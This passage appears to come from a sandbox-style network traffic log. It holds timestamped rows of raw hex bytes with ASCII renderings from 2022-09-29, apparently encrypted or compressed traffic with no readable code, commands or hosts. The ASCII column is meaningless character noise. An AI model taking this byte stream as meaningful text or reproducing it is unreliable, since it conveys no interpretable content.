                                                                                                                                                    2022-09-29 12:59:02 UTC6657INData Raw: ad 54 62 67 5c 4a 44 47 d2 6b 39 92 d0 bb 7d d6 45 05 4b d7 e1 bd 64 f9 98 dd 15 5e 8d 4b 7a ae df a7 fe 48 c1 cd 05 c3 d3 c2 67 b2 af b7 c1 87 a2 da 83 70 a8 c4 c2 3a ba 6d ef 70 09 78 c1 ed 13 16 35 e8 8b 22 e4 02 94 60 21 11 2c 3d f7 a9 28 b1 5d 7c 03 f4 24 d5 91 6a fa 6c 73 c8 a3 b9 1e 6c b2 be ae 14 e7 50 42 a1 50 d5 b0 02 86 f4 9a a5 46 d6 22 61 a0 38 84 bd d2 0b 8f f8 27 f5 50 92 58 66 98 79 5d e3 b0 99 dc eb 58 d6 b3 69 eb a9 10 de 73 0d 6b c0 bf b8 45 a6 00 b2 c3 cc 11 27 e8 1e 64 74 82 cd cc a9 fe a9 d0 93 87 9f b2 c2 34 b9 94 08 48 72 a3 4a 15 54 2d 52 42 3c 4f bc af 02 3c 2f a7 be 88 9a fb 69 65 3d 6a 74 20 cc 98 10 24 ee 19 fa c0 81 b1 5e e1 87 c4 7f ce eb ef ef 22 b5 4f 94 7f 96 00 63 45 4b 98 00 c1 12 32 25 de f0 6b e6 9f 78 17 1b 39 6a 7d
                                                                                                                                                    Data Ascii: Tbg\JDGk9}EKd^KzHgp:mpx5"`!,=(]|$jlslPBPF"a8'PXfy]XiskE'dt4HrJT-RB<O</ie=jt $^"OcEK2%kx9j}
                                                                                                                                                    2022-09-29 12:59:02 UTC6673INData Raw: 74 be 36 56 cd ed 65 85 d6 3b 9f 9a b8 f5 21 7a 85 fe 93 cf 62 fb ac cc 12 14 de c3 17 53 3a 47 74 09 6d aa 62 cc 3d 7f 6f 9d ef 87 a5 cd c8 b7 cf 45 32 71 37 f8 35 d8 9e 26 bd 9e cf ae 2c 97 4b 51 42 14 05 4a 33 5a 83 01 cb f6 8c 2d 2f c5 2c cb 81 c8 f1 71 a1 33 81 99 43 5a 18 52 66 e3 08 1c d0 74 b9 87 e2 19 df 71 7d f6 8f 64 70 75 33 47 bf 6c 0f 5d 2a 0c 5a 11 9f 92 c8 b5 f8 e7 f1 13 c9 59 9f 1d db a8 d0 97 06 f5 d2 72 1c e2 1f 00 fa d7 70 6b 19 2d 47 2d 42 08 f2 10 f7 6f ef 69 29 1e cd 36 f8 14 dd 71 bf d4 e1 ba 7a 82 2e a9 4f ad 8e 48 aa a9 c0 48 8d 63 9b 82 49 f5 fc a8 4f 7a b4 61 83 97 52 fe 79 16 65 a2 9e dd fd 21 d9 41 ac c0 e8 d9 b2 57 84 64 a0 5a a3 09 5f 1f 9d f3 0f 39 81 87 a8 9e 45 77 bb 91 7f 3e 3f 53 24 62 c7 4c 5f 87 1f ce cf 79 4d 57 83
                                                                                                                                                    Data Ascii: t6Ve;!zbS:Gtmb=oE2q75&,KQBJ3Z-/,q3CZRftq}dpu3Gl]*ZYrpk-G-Boi)6qz.OHHcIOzaRye!AWdZ_9Ew>?S$bL_yMW
                                                                                                                                                    2022-09-29 12:59:02 UTC6689INData Raw: 95 3c df 66 4d cf cd 50 64 54 a9 b5 3b f5 d5 6f 10 f7 65 02 da c3 a6 0e 74 e5 94 51 af d7 91 ce 61 34 31 7e 1d e7 47 3a 68 37 0c 33 20 e8 17 da 95 ff cb 23 f6 69 30 5d 93 66 b7 ec 38 c2 a8 25 9f 25 d0 b4 92 ac 08 0b 88 35 68 97 78 0c 49 99 60 47 73 4d 51 d8 7d e0 80 35 89 6c fa 30 89 5b b0 cf fb 0b 2e e2 b6 c8 80 0a 1d cc aa 04 90 3f 06 24 28 ce ef 6c bb 8b 0d 8e d4 43 45 8d 94 a2 d2 9b dc ab c7 a6 5a d3 a2 ee 9f 13 ad c1 d8 69 d9 4e da 7f 13 a3 4d 61 08 04 a1 9f 39 8d 79 ba 7f 62 9b 45 2e e8 23 e2 18 83 bf ea 6d 7e c3 71 df eb 5f e0 ad 37 16 4b 47 77 28 e6 0d ab 4a 13 93 bb cd 55 aa ff ab 6b 5d 7d d6 e8 00 c3 5f 7b 49 e2 2d 51 ab 66 33 52 78 ea ad 74 f5 65 9b f7 ed 8b f1 1b f9 be ac 34 6b 43 c9 6b 3f fb 2d 10 39 61 d6 d2 a0 97 e2 62 62 ae 5b 8f df 79 d9
                                                                                                                                                    Data Ascii: <fMPdT;oetQa41~G:h73 #i0]f8%%5hxI`GsMQ}5l0[.?$(lCEZiNMa9ybE.#m~q_7KGw(JUk]}_{I-Qf3Rxte4kCk?-9abb[y
                                                                                                                                                    2022-09-29 12:59:02 UTC6705INData Raw: e0 dd 2c 18 a4 42 6c 29 a1 b2 96 c0 fe b7 e7 fb 80 d4 d5 9f 7b 1d 1f 58 3b a6 bd 58 0e b0 58 36 65 d1 0d df e9 f3 55 b9 b8 b4 7a ad b8 0f 0e ea 57 c5 cb 6a 4c bd 17 fe 91 b9 8e 92 ef 23 3d 79 22 c0 4b d0 d6 02 4a 42 68 c8 e3 ca c1 46 ee 9c 4c 6d 51 c8 45 c5 97 4a a5 6f 13 41 98 82 d9 00 4b bd b2 63 53 7c c4 ad cb 0f a1 4b b0 8b dd 4b cd 5c 49 88 44 24 f6 54 43 85 9b f4 5a 48 d0 ae ce 36 4b d1 cd 2c f7 3f 74 26 56 e0 23 eb f5 46 b4 21 f8 07 71 cf 38 92 ac 47 f0 93 42 05 ac c4 95 27 65 aa f2 d2 f3 6a 30 89 35 59 ef 89 05 66 19 3a bc ee 7a 3d a9 e6 09 4f 80 21 df cf 7c 82 46 97 2f f7 ef 2c f6 02 d9 2b b1 c9 98 4e cb 63 ec 24 c3 81 ac e8 6f c1 52 1d ce 48 01 6c 32 e9 ea 61 0d fd 49 35 d9 73 fa 88 1c 63 33 ef 20 22 8b 35 fd 75 0a be ac 51 89 e6 b5 d5 6d 4d d2
                                                                                                                                                    Data Ascii: ,Bl){X;XX6eUzWjL#=y"KJBhFLmQEJoAKcS|KK\ID$TCZH6K,?t&V#F!q8GB'ej05Yf:z=O!|F/,+Nc$oRHl2aI5sc3 "5uQmM
                                                                                                                                                    2022-09-29 12:59:02 UTC6721INData Raw: 17 a2 9e 08 58 73 d7 67 8a 2a 11 0d b1 01 b3 4f 00 82 96 24 94 8c fc 3e cc 1a 89 ff 62 69 15 35 a8 a4 38 f5 a8 47 37 f9 e6 0b 82 32 bf 3c 20 12 9b 34 26 fe 75 e2 2c a1 ee 58 0e 24 07 4b ef 14 2e 6d d5 de e8 28 4e e1 c3 9c d3 09 89 b4 ea 3e 85 6c 8b da 83 5c bf 0f 00 ba 37 b5 d8 e1 9b 7f f6 06 af e5 32 5d 08 93 7b e6 da 49 e4 76 61 42 76 84 80 e7 9e 30 09 e8 ef bd 6d 68 40 da 31 91 71 50 2f e1 32 c5 00 a7 5b a8 92 69 3e ca 31 c5 11 c4 ff 45 4b 61 17 43 5e 3f a4 3e e2 51 7b 97 24 d1 ea 26 c8 00 74 e0 a4 0a a1 dd a5 95 17 a7 31 82 82 95 9e 6b b8 17 da 6c 9b 56 f9 be d8 b3 fc b9 90 ae 7e 9e df aa 24 66 59 f4 2b 9b d1 52 15 3d 5d f1 0c 7f cf bc cf 5b 0c 36 2c 02 1d 78 8e b1 b8 84 15 d6 2f 89 d6 44 19 45 85 d9 2e f5 9e b9 4d ef b9 bd a1 6e 1e da 8f 17 36 16 c2
                                                                                                                                                    Data Ascii: Xsg*O$>bi58G72< 4&u,X$K.m(N>l\72]{IvaBv0mh@1qP/2[i>1EKaC^?>Q{$&t1klV~$fY+R=][6,x/DE.Mn6
                                                                                                                                                    2022-09-29 12:59:02 UTC6737INData Raw: 13 71 14 ec 91 58 3f 37 38 88 24 65 8a e8 ae ac 99 6a 5a 51 10 4f 9d 00 a7 4c 3f 59 10 04 b9 30 d3 4c 0f 78 98 27 c6 3d 84 f9 fd 36 68 33 6b f1 c3 3a f9 1b ac d8 7a ac 86 a3 d4 d9 d1 11 4b 8e 33 47 53 d8 cf 89 1e 47 43 df 41 c4 34 b0 d6 3b d3 ff 1a bd 79 9a 47 87 a9 b6 51 01 35 fe 95 da d3 76 d8 10 20 df 5b e6 22 58 9b 21 dd f4 5e 62 b2 9e b0 ad 68 40 a9 f5 d9 05 fb 04 70 3e 2a 1d 8f 10 9f a6 49 2e 05 72 cd eb 08 b6 a6 27 2f d8 91 e0 aa f4 3a 7b d0 8f 8a ea d7 b7 ee 7e bd 22 da a9 d6 1f cd c6 86 ef e2 40 b4 1e a1 c0 cf 9b 7b 09 a9 8e d5 c2 3c 89 c1 f1 4c 52 e9 4d 09 14 37 8f c5 f1 9e f8 b0 49 34 68 cb 21 2e 65 0b 65 e5 ac 0d ca 69 46 0d 16 5d 04 b9 b0 f0 d2 c2 f1 28 39 69 b5 2d af c4 ee 45 64 31 70 f9 4f 50 05 b5 4c e5 7f 2b 14 1e 79 16 79 76 af 22 68 f5
                                                                                                                                                    Data Ascii: qX?78$ejZQOL?Y0Lx'=6h3k:zK3GSGCA4;yGQ5v ["X!^bh@p>*I.r'/:{~"@{<LRM7I4h!.eeiF](9i-Ed1pOPL+yyv"h
                                                                                                                                                    2022-09-29 12:59:02 UTC6753INData Raw: 2c e0 f6 9d 51 8d 55 e6 03 76 d2 f8 38 72 20 ba be 8a 08 03 91 a3 89 d6 be 26 ec ed 32 2b 91 52 f1 a9 da 22 37 dd 5e a9 0a f8 9f 29 d5 e1 a4 dc 49 eb 88 08 13 b3 21 96 b5 c8 95 08 75 67 40 1b 2a c9 d7 23 71 b3 8c b8 43 2c af d9 62 f3 a7 6e e8 d4 07 a1 b4 b9 94 2d c1 44 74 09 a8 4d 0d 6e fa 78 05 58 19 36 af 04 99 41 68 b7 84 fc 0b 11 5a bb ee 2f dd 2a 52 54 b8 d7 0d ce dc 88 81 af b6 9f 59 b7 3b a1 fa 10 54 2c 93 f1 c7 eb f1 38 1c 48 9f f4 3e 1b 55 e2 31 5a 18 ef f0 65 b8 5f de 44 3a b1 86 2a 91 41 64 0b 8f f6 8f f0 41 d2 29 c3 18 d2 88 5a 70 9b 82 da cf 45 46 2b 1f 83 d6 77 d8 ab 40 d2 9b 2d 76 d7 02 f5 06 e2 0c 82 2e 34 86 14 f5 67 b7 43 e7 a6 84 d2 57 fc 7a 0d 09 7e 37 44 9a bf 8e 8c 5f df cd a6 2c c1 eb 7d ac ca 93 07 b2 55 be fa ec 9f 85 7a 7b 72 fa
                                                                                                                                                    Data Ascii: ,QUv8r &2+R"7^)I!ug@*#qC,bn-DtMnxX6AhZ/*RTY;T,8H>U1Ze_D:*AdA)ZpEF+w@-v.4gCWz~7D_,}Uz{r
                                                                                                                                                    2022-09-29 12:59:02 UTC6769INData Raw: 58 f6 b2 9b a0 75 11 97 24 ac cb 39 9f 8f 74 f2 a8 ed c6 bd 27 db ec 09 8f eb 32 f8 0d b2 60 25 87 5d 96 06 8d 46 f9 73 eb 6c 7c 1e 5c 17 f8 b1 63 82 3b 4b 63 a6 9d 3f 9e 67 89 d3 57 84 ec cb 79 25 02 77 85 dd 0c 49 da eb c0 d9 0b 51 16 2f 78 f9 09 1b 98 9c eb 81 a2 fc d7 e3 17 e2 0e 70 8d 23 5f 88 d8 2a b7 60 7f cc b4 5c 05 2a a1 2e d8 3c 19 12 2d 76 26 40 1f c6 08 4b f6 60 9d 38 c3 67 e4 fe 1a 2e 72 1b de 93 ac e8 f0 8e 0e c7 b3 03 4b 3b de f5 a5 17 77 ac ab b5 5b 17 22 e8 1a fe 24 17 8a fb f5 e7 7d c3 dd cd 78 9e 49 58 36 22 32 ee ef 00 98 e6 3f 5c 3b 16 e7 38 2f 81 28 13 5e ac 24 06 dd f2 aa 64 33 37 25 cd 8e 08 39 57 7f 76 05 67 39 9d 6d 0a 85 d9 e5 4b 0e 16 35 45 4a 1c 2e 68 1f 51 5f 43 1e 34 76 c9 88 5b 30 58 b4 37 11 28 7e 88 63 4c e2 71 07 cc 4b
                                                                                                                                                    Data Ascii: Xu$9t'2`%]Fsl|\c;Kc?gWy%wIQ/xp#_*`\*.<-v&@K`8g.rK;w["$}xIX6"2?\;8/(^$d37%9Wvg9mK5EJ.hQ_C4v[0X7(~cLqK
                                                                                                                                                    2022-09-29 12:59:02 UTC6785INData Raw: f2 51 e5 d9 3a 46 26 3f db 5a 21 d1 53 9e bc 9b c4 9b 18 79 ae ef b8 95 90 48 0d 93 2c 4b 12 cd 61 d9 1d 3d 07 f0 df 93 b3 21 2b a0 5c 7b 2f ab 41 fc 30 d6 47 f1 60 f4 42 e1 23 6f 19 00 d8 ff 8d 01 b0 0e ca 32 96 de 17 61 76 77 fc dd bf 1f 0a 96 4d e5 2f 56 c4 bf a4 87 04 c5 0a 91 d8 08 1a 5c 00 22 0c b3 0c a4 6b 34 07 02 58 92 78 01 9f 96 a0 4f 89 ac ef cb 5d 97 1e bc 0d b8 f2 74 f6 2f 4f da d2 cd 29 0e a0 34 7e 57 3e 66 ee 78 52 5a fa 1b d6 eb 03 34 7b cc 76 48 06 83 e8 6c 7f 57 0e e7 68 bd a3 3a 6f 46 aa f8 fa d2 34 f3 ca f8 18 b4 09 b3 12 f4 1b 7a f2 fa ec 53 17 fe cc 06 a9 84 d4 9e 85 49 09 68 e1 3c 2b 1e b1 ca 83 8e 92 31 6b 2d 26 70 55 13 47 e3 57 02 2e 91 d9 85 93 2f 67 0f a5 41 ad 13 e6 3a c1 94 22 bb c6 62 8e ed 6c e6 5e 5b 64 5d 8c f9 73 67 7b
                                                                                                                                                    Data Ascii: Q:F&?Z!SyH,Ka=!+\{/A0G`B#o2avwM/V\"k4XxO]t/O)4~W>fxRZ4{vHlWh:oF4zSIh<+1k-&pUGW./gA:"bl^[d]sg{
                                                                                                                                                    2022-09-29 12:59:02 UTC6801INData Raw: cb ca e9 2a f8 d5 98 cf 14 da de b2 18 80 e2 4e 2b 04 80 7c be c1 36 48 a1 c0 09 b4 5b d1 9f f1 c9 48 c0 b0 92 1f 6b 2c 82 4e 16 52 42 15 0a 5a 0f 46 41 91 fa e9 4a 21 e6 61 71 70 75 e5 22 e7 0d b9 38 64 45 40 d7 0f 8c 89 4f ec 9f f9 53 84 7d 23 72 1b 6e aa 76 03 02 70 0f 9f fd 49 3c b6 06 ae a6 e4 3c 69 18 7c 85 13 a3 b6 db 13 65 af 9c 47 8b a5 17 78 58 2b e0 a9 78 f7 b2 0b dd 8c 63 69 8e 2d 1c 2d 4c b0 6b 25 81 69 58 72 6b 94 02 d6 24 d7 94 7c bf 75 87 7b 4e 39 dd 9c 4f d2 26 b7 d4 1d 4d a1 93 90 23 b9 2c ee 1a bf 1d 6e be eb 20 de 78 2b 13 6e 84 7d 18 c6 a3 4e fb b5 a4 96 60 92 80 3f 31 bd f9 53 62 92 0a 9c 41 27 74 c4 f5 6e cc 27 84 65 98 6f 2b a0 77 9e 0f 06 d9 45 36 38 3a ef 4e 61 b9 e3 70 02 1e 8e 46 56 0a 4d fc 5e 2f 7a 8c cd 5e b1 ee 2e 3c 4f 72
                                                                                                                                                    Data Ascii: *N+|6H[Hk,NRBZFAJ!aqpu"8dE@OS}#rnvpI<<i|eGxX+xci--Lk%iXrk$|u{N9O&M#,n x+n}N`?1SbA'tn'eo+wE68:NapFVM^/z^.<Or
                                                                                                                                                    2022-09-29 12:59:02 UTC6817INData Raw: 19 02 6c 6c cb b2 bc e0 9f cb 5e bb 43 b3 54 36 84 35 0b bf 6f 30 ff 32 f6 2c 9c 10 ca 34 a3 06 30 11 e4 3a f6 a0 62 a6 46 5b 5b 90 cb 62 ca 3d 5e db 45 e1 b7 d7 f2 c5 4f b0 b7 c9 97 bd 13 8e 4f 2e 8c 6d 02 4c d3 b0 04 d7 3b 82 01 af 22 4d d6 5b 09 62 88 2a c2 34 c4 ec 3b 97 56 ef 07 53 12 91 41 20 6a 56 56 b9 16 27 c4 04 84 a9 45 4f a6 08 d0 ed 7f 32 13 16 86 b5 d4 be 2c e5 1a be 0f 32 f7 65 3b eb 7d e3 87 f3 df 43 41 67 d0 9c ea 76 c7 57 eb 79 22 8c 1e 3a dd 77 ba e0 03 be 0f 04 01 ef af 16 fa bc c3 91 99 9a 07 68 be 81 66 8d a1 c8 72 29 f4 47 06 3b 87 05 19 ca 14 fc 54 40 3b 00 5b 38 94 c3 9f fc fb 1d be 36 88 29 02 e0 17 59 54 37 63 32 8e 45 ca f2 e3 b5 d2 bf b6 29 b0 9b 6d fb 70 5f b9 5e 86 cd 94 80 17 b7 f1 4c 1e ee 25 76 ec 9e 44 94 91 0b 1f 93 39
                                                                                                                                                    Data Ascii: ll^CT65o02,40:bF[[b=^EOO.mL;"M[b*4;VSA jVV'EO2,2e;}CAgvWy":whfr)G;T@;[86)YT7c2E)mp_^L%vD9
                                                                                                                                                    2022-09-29 12:59:02 UTC6833INData Raw: b2 a6 5f 57 b6 cf 7f 21 1b 25 3e cd 0c cc d2 15 bb 86 85 f7 a3 c7 c6 cf 11 6d 53 a9 48 93 09 d3 22 a5 38 03 07 f9 de c6 f9 97 6a e0 5c bd 8a 6a 78 80 a6 40 a5 f8 95 c7 01 47 cc 23 6b 53 55 eb 63 30 75 0e aa fe b6 78 1f c6 41 66 4a 62 fd 17 56 33 59 dd e1 90 b5 e2 e1 4e d9 61 2c f0 c3 29 9c e8 8a 42 48 19 0d a4 e3 ec 4c 8d 76 67 6f e1 9a 98 61 31 3f ef e5 15 db b0 46 d2 72 35 48 f0 56 bf 87 43 ed ef bf b6 ed 16 f8 cd 4c 89 61 84 29 63 4a 40 78 3e 17 f2 4f 1a 53 e3 18 40 3c 03 4a 02 60 6f 2d 57 6d ed 07 e4 0e 0f 6b 72 e7 47 3a 3c e3 f2 3b 3b df f3 a9 50 e3 9f 65 31 40 cd 12 96 35 6d d9 dc 1d 9d b5 f9 18 b0 92 1e 3a 6f 58 0f 71 3a 9a b9 8a 7d 10 33 30 b5 3e 00 21 06 5a 6f 42 2e 4e 20 26 45 67 1f 17 2b ed 3a 0b 29 93 dc e0 a0 64 8c 2c dc 75 ae e4 c1 d7 58 1d
                                                                                                                                                    Data Ascii: _W!%>mSH"8j\jx@G#kSUc0uxAfJbV3YNa,)BHLvgoa1?Fr5HVCLa)cJ@x>OS@<J`o-WmkrG:<;;Pe1@5m:oXq:}30>!ZoB.N &Eg+:)d,uX
                                                                                                                                                    2022-09-29 12:59:02 UTC6849INData Raw: 72 28 38 28 e4 16 76 4b 78 10 6a 9b 90 d2 f8 2b 4d 10 ae 7b 10 96 c0 d8 8a 95 09 2b c0 85 a9 0f ef 26 3a fa e3 76 55 03 91 a8 36 4b 72 07 9d bd 59 5c 82 0b 53 1a 52 81 45 e4 ef 6f d0 2c f5 4c cf 25 0f c5 3b d2 77 83 a0 c2 15 1a cd 30 ec 29 ca fd 5d 9b 4f 84 69 1e 56 0e bf c0 5a fe ea 5d f7 02 3b 54 74 ca a3 fd d9 27 1f bb 66 c9 20 4e 97 30 b9 cf d5 2e 29 db d8 00 e6 28 12 30 cc ac 4f 40 6b 57 78 aa 10 ab d4 cd 56 81 25 cc 3e c5 f4 05 8c fb 1a 82 54 1b 3b 9d a7 aa 43 cc 00 b8 b0 48 2e 8f 6f 8f 5e d5 0b e7 66 15 4f 4c 94 b0 c2 7b b0 0e 49 d1 b4 ce fc 9a 53 72 dc 9d 2b 75 0b 8b 75 5a ef 8f 58 b5 09 47 bc 43 42 b3 1f 18 38 b7 3a 21 e7 16 00 01 dc 86 b4 af 7c 48 54 b3 ef 62 be 8d 1d 85 a0 87 3c e7 88 71 be a8 0a 1c 49 1d c7 af 7f cf 71 a9 25 38 49 df f4 db 36
                                                                                                                                                    Data Ascii: r(8(vKxj+M{+&:vU6KrY\SREo,L%;w0)]OiVZ];Tt'f N0.)(0O@kWxV%>T;CH.o^fOL{ISr+uuZXGCB8:!|HTb<qIq%8I6
                                                                                                                                                    2022-09-29 12:59:02 UTC6865INData Raw: a9 99 61 68 2b 89 00 d3 34 7a 35 54 59 5b d4 9e d0 17 5e d4 79 55 c8 45 b2 9a 4f 77 f0 1e 52 f5 63 1f 9d 44 e1 7e 9b b3 0e 1c 33 3f a4 90 53 71 8d 18 51 d0 44 cc 5e 29 39 5c c8 46 50 3f c5 b0 2a 8e f2 8c e1 e2 f8 9e 69 89 ed 77 ce 3c 52 30 6c c5 c3 29 f1 77 b1 c1 3e fb d8 b0 98 61 dd 59 07 16 df 75 84 91 71 6f 9e a2 99 30 62 72 3f f9 7c 89 97 28 72 cc 9f 22 f2 41 29 d4 10 a4 8b d1 b8 78 8f 61 57 62 d1 62 26 17 07 ec ed 5b 51 31 ac 0d 53 25 30 15 e9 3e a1 21 2f ae 8e 2e 23 13 9f ab a6 e2 67 a4 8c 5b ba 2e 71 82 97 53 d3 5d 0f 50 3c 2c 52 99 f6 73 49 83 a1 7f f7 cd 7d bb 0b 93 63 35 ae 40 ba 5a e5 64 86 10 e8 b8 b6 47 bb e7 fe c7 e9 92 c9 0a 8f 86 fd 37 1f ce 3b 4a cc d4 10 86 a9 cc 79 a7 b1 48 91 ca 5b 1b 79 c3 86 36 00 d0 b2 83 75 b9 9d e0 e4 2e a7 2e 23
                                                                                                                                                    Data Ascii: ah+4z5TY[^yUEOwRcD~3?SqQD^)9\FP?*iw<R0l)w>aYuqo0br?|(r"A)xaWbb&[Q1S%0>!/.#g[.qS]P<,RsI}c5@ZdG7;JyH[y6u..#
                                                                                                                                                    2022-09-29 12:59:02 UTC6881INData Raw: a5 ff e0 ca ab 7f 60 d3 c2 0c d7 df d1 52 c8 d6 d7 4b 1d b7 0a 48 ae e3 d5 be b1 02 c0 2a de 1c 7e dc 2e 40 07 12 10 85 d3 79 52 32 c9 32 3d 21 9e b1 a4 8b 72 6f 70 59 3c da 90 c9 5c cc b8 18 00 f7 0c 56 ca ec b7 74 72 42 da 47 6e 30 c1 bc a4 f8 37 fc a3 68 62 af a2 f2 06 a7 4a 0b 6a fa a1 c1 d1 b3 91 c6 5f 65 0f 10 5d cf 0d e2 05 79 7f ff 5d c3 52 91 a4 b6 89 10 e7 12 05 cb ec 20 1c bd 7f 85 10 10 73 89 73 41 72 98 e1 2c f4 47 b9 6e 9e b3 c6 5b f2 c4 e5 9e 5b 57 f6 a8 86 42 6f a8 08 7c 1b 88 75 ef 69 3f 3b 0f 13 3d 95 16 eb e3 f3 9e 7d ed be 1e 49 c2 36 f1 d4 d1 b8 6f a3 7e fc 75 41 d1 82 c8 ca 0e e2 10 76 1e 72 6b a3 1a ea 7b 7b 6f 7f 3c 74 2c 3f 24 3a 49 be 2f 2b cc d7 c7 ad 72 e4 88 ea 9d 3d 66 13 2e 09 e6 5e 80 63 0f 41 83 86 e5 f2 ac 60 7d 0c 8e dc
                                                                                                                                                    Data Ascii: `RKH*~.@yR22=!ropY<\VtrBGn07hbJj_e]y]R ssAr,Gn[[WBo|ui?;=}I6o~uAvrk{{o<t,?$:I/+r=f.^cA`}
                                                                                                                                                    2022-09-29 12:59:02 UTC6897INData Raw: bb c4 e5 b7 5b 2f 1f 7a ce 36 87 7c cb 13 6e 41 f1 47 0e 42 22 ef a8 96 62 04 82 6c bf b9 c5 3e 5f b3 56 72 0c 64 dc d5 16 5d 84 cc 75 8a 86 f4 24 36 78 d9 0c b3 8f be 18 8d fc 7e f0 a2 03 7b fd 9b ad 98 01 c6 23 81 ad 1e 80 35 22 e2 cc 62 30 d4 f3 36 72 bd 56 96 df 3f 92 28 77 e2 84 d3 de 6f 7e 5b 97 56 30 5e 12 41 40 63 96 7c 85 17 8a 9f 60 22 8d 2c b8 ca 77 39 a0 69 35 7b f4 ce 17 cb d5 c1 a4 73 02 4c 04 9d 8a 07 4a 36 3b 34 cf 9a ca 0d 77 da 4f 66 a7 62 58 56 b5 ee d0 6a bb c4 3d 36 f8 35 ad 12 e2 55 d2 b3 87 aa 74 4d ac 7e 43 00 58 a7 5f ea 43 33 77 d1 ed d7 35 21 f3 4a 26 78 51 00 22 de 79 9d f8 07 9f fc f1 95 15 28 0a 05 16 38 ad 25 9e be 9c 52 e1 e3 41 83 5f 04 82 e4 76 f7 38 03 18 d5 c3 a3 43 aa 72 2b 45 da a1 3d 74 66 8b 25 fb 45 8d af 17 2e f0
                                                                                                                                                    Data Ascii: [/z6|nAGB"bl>_Vrd]u$6x~{#5"b06rV?(wo~[V0^A@c|`",w9i5{sLJ6;4wOfbXVj=65UtM~CX_C3w5!J&xQ"y(8%RA_v8Cr+E=tf%E.
                                                                                                                                                    2022-09-29 12:59:02 UTC6913INData Raw: 62 03 f9 4a 3a ba b8 36 18 2a ca c2 d8 b8 9f 3c ec fb 14 64 86 4b 3a b3 62 73 53 f6 af 8e d0 17 f4 99 04 2c 62 05 ce 6e 2a fd e4 fa 8b a6 32 60 d0 b7 72 d5 3a ec 29 40 3a 01 e2 8c 43 87 2f 66 ff 66 f7 f0 ba 8a 2e 0e b4 84 f1 09 5f a3 d7 9d df 1a 3a 13 30 7e 21 c9 a0 93 5f 9e 61 8c ea 87 bd d5 98 b3 b7 fe 54 eb c8 a4 63 83 06 a4 03 03 c7 ce 51 c8 37 a1 68 a0 ae e7 89 f3 33 ae 15 d8 c8 d3 8c 55 7d e0 c0 db 06 2c 7b d7 29 e1 45 cf 27 7a 2a af 7c 41 d1 8d 8f ec 5d 9c 2b 2a 8a c4 36 7b e8 67 86 ac fc 11 5e b6 1b 3c 9a 41 7c f9 ac d4 d4 f4 58 3d ca 9a 85 8c 64 e2 26 7c 41 78 be 07 6c c4 94 47 f2 35 5f c7 aa 86 40 d5 27 72 b1 dd 51 da d2 b7 56 fb eb e6 71 12 d0 d3 43 36 fb be e4 2a 32 5d ae cf 62 2c d8 6d 81 c4 d6 d2 4b 48 42 19 a2 fe ed f0 83 a4 83 f3 31 52 b4
                                                                                                                                                    Data Ascii: bJ:6*<dK:bsS,bn*2`r:)@:C/ff._:0~!_aTcQ7h3U},{)E'z*|A]+*6{g^<A|X=d&|AxlG5_@'rQVqC6*2]b,mKHB1R
                                                                                                                                                    2022-09-29 12:59:02 UTC6929INData Raw: 5e f6 9d 59 37 f9 1c f7 b5 d9 3a 7c 58 9e 65 54 c3 08 39 81 19 87 c8 1e ff e5 eb 5a 6d e5 3d de d3 25 16 d1 c3 b5 c7 24 e3 d7 f1 32 5c d2 9c 25 d6 97 a1 a5 7b 66 82 45 0e 96 f6 0f 92 a9 d8 0d bf 6b 1f 9f 37 88 0f 27 b1 e5 ea dc 07 3b aa 14 a6 eb 71 0a 41 10 57 4c 98 91 d0 1c 52 c4 e7 97 78 35 0e fa f8 97 92 c2 dd 3b 5e 8c fe 44 42 16 e6 ef dd 2a 94 80 95 a3 87 5c d2 85 17 c8 51 fb 78 dc f3 50 df ff ad 32 23 c8 56 a2 ac e2 ff 27 02 3f 3d ee f9 bb 57 d0 39 d2 9a 8f 73 75 d2 8b ad 74 e1 7a dc ab 22 25 ed e7 85 2e 1d 6c 9c d5 83 d0 1f 13 1e 05 c0 01 dc 2c 0a 4b e1 9e 2e b8 d4 85 98 d6 b2 4e f2 4c 8e fa b7 d4 9c a8 4f ff 62 3f 00 12 42 46 a9 ac 51 9e 15 ba 02 d7 7d 55 ec 32 dc 18 4c 55 84 36 b6 0f 41 4b db e7 e1 be 5c 60 f3 79 88 bb 76 26 3e 14 8c af 2c c8 28
                                                                                                                                                    Data Ascii: ^Y7:|XeT9Zm=%$2\%{fEk7';qAWLRx5;^DB*\QxP2#V'?=W9sutz"%.l,K.NLOb?BFQ}U2LU6AK\`yv&>,(
                                                                                                                                                    2022-09-29 12:59:02 UTC6945INData Raw: c0 82 de 0f 25 54 89 e0 71 56 33 79 07 da b7 a3 d8 5e 2b 2d f9 d8 93 94 67 96 a1 7e 33 2d 70 54 e8 82 73 fc 32 3d 42 8d ee a3 07 1f 6e a5 b8 81 9e 1f 91 00 46 46 7f 05 5a 1f d5 5d 76 20 84 a8 c6 a8 7f 5a 34 0c 4a b5 74 89 64 ca d7 cf 78 cf 23 df 6b 03 7e b1 72 55 97 7f 12 c9 22 88 f1 a2 7b 87 37 83 f4 ce df d9 56 b3 e8 69 ce fa 35 55 23 78 2d 89 25 c0 47 2f 6d f8 59 c4 0c 03 72 4f d3 68 a1 cd 1f 30 62 99 89 49 4b d8 5e 0a 55 61 d7 4a 87 52 bc db bf 0a 98 cd 37 5a 2b 22 11 8e 18 f9 e5 6a 46 db 9d 4a f8 d1 fc ca a3 c3 6d 69 25 c6 1b a1 79 c6 8e b1 b6 a0 48 80 31 b1 18 66 4a cc 86 a8 dd 98 62 c5 3d 4d 26 9c 64 7c ea d7 b6 8e 03 b4 10 f6 32 6d 97 98 8b 80 44 e1 a1 1d e0 ad c0 43 54 bc 36 e9 ed 3b 8b 70 e4 e6 9a 68 5f cd ae 90 d1 d5 72 f8 0a 4f a7 a6 cf 83 0f
                                                                                                                                                    Data Ascii: %TqV3y^+-g~3-pTs2=BnFFZ]v Z4Jtdx#k~rU"{7Vi5U#x-%G/mYrOh0bIK^UaJR7Z+"jFJmi%yH1fJb=M&d|2mDCT6;ph_rO
